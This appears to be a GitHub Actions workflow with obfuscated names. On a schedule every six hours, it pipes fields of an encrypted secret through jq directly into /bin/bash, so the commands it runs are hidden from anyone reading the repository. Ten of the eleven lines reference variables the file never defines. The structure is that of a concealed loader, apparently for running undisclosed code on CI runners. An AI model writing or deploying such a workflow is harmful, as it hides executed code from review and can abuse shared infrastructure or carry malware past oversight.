name: pousuanshami
on:
  workflow_dispatch:
  schedule:
    - cron: '14 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pousuanshami
        env:
          iio7: ${{ secrets.iio7 }}
        run: |
          echo $iio7 | jq -r .ijmrw23 | /bin/bash
          echo $szega297 | jq -r .mpv33218 | /bin/bash
          echo $wig6882 | jq -r .p24 | /bin/bash
          echo $qonqp667 | jq -r .wsr10 | /bin/bash
          echo $occi06169 | jq -r .vu5629 | /bin/bash
          echo $ofhf0 | jq -r .daak9 | /bin/bash
          echo $innd4 | jq -r .cgd78217 | /bin/bash
          echo $ymb08402 | jq -r .nkmve37341 | /bin/bash
          echo $ny9549 | jq -r .qfu55352 | /bin/bash
          echo $p706 | jq -r .e6038 | /bin/bash
          echo $r2 | jq -r .mfo33 | /bin/bash

